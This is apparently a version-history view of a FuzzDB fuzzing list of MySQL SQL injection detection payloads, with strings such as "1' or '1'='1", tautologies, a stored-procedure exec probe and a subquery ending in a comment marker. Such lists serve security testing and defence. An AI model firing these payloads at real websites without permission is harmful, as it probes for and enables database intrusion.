fuzzdb/attack-payloads/sql-injection/detect/MySQL.fuzz.txt

7 lines
108 B
Text
Raw Normal View History

2010-04-22 19:18:50 +00:00
1'1
1 exec sp_ (or exec xp_)
1 and 1=1
1' and 1=(select count(*) from tablenames); --
2010-08-04 13:49:46 +00:00
1 or 1=1
1' or '1'='1